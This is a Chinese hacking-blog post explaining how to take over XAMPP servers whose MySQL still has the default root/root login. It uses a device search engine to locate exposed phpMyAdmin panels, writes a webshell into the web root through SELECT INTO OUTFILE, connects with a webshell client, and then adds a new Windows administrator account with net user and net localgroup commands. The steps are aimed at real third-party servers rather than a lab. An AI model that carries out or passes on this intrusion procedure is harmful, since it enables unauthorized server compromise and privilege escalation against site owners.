记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

xampp默认配置拿shell

2016-04-25 15:25

 首先我们先来科普一下xampp(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。 然后在安装xampp的过程中 很多网站管理员对于mysql数据库密码 都会直接 默认  所以 就照成了这个漏洞的产生

=20160407205536

好了 废话不多说 我们直接上神器钟馗之眼 server-status – server-info – phpmyadmin 账号密码: root/root port:80

\

如图找到一个网站 进去 初始的phpinfo 箭头指的是phpmyadmin的登陆地址

\

我们记下网站根目录C:/Program Files (x86)/xampp/xampps/htdocs

\

点进去之后我们输入 默认的用户名和密码 root root

20160407205625

20160407205906

进去之后我们呢输入sql语句 select ‘’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’
写入一句话 

 2016040721002820160407210019

菜刀连之  然后我们在说一下提权

20160409145505

20160409145519

首先输入命令 net user mgsrc1 Mgs?1234567890 /add 创建一个用户名为mgsrc1密码为Mgs?1234567890 的用户

然后输入net localgroup administrators mgsrc1 /add 将用户mgsrc1添加到管理员用户

(ps:在提权的时候 也走了很多弯路 这台服务器 的密码策略没关闭 所以 密码组合必须为一个大写字母 加一个符号然后加数字  而且 这台服务器 密码位数不能超过14位 不然就无响应)

20160409150837

提权成功~

知识来源: www.2cto.com/Article/201604/502403.html

阅读:283897 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“xampp默认配置拿shell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词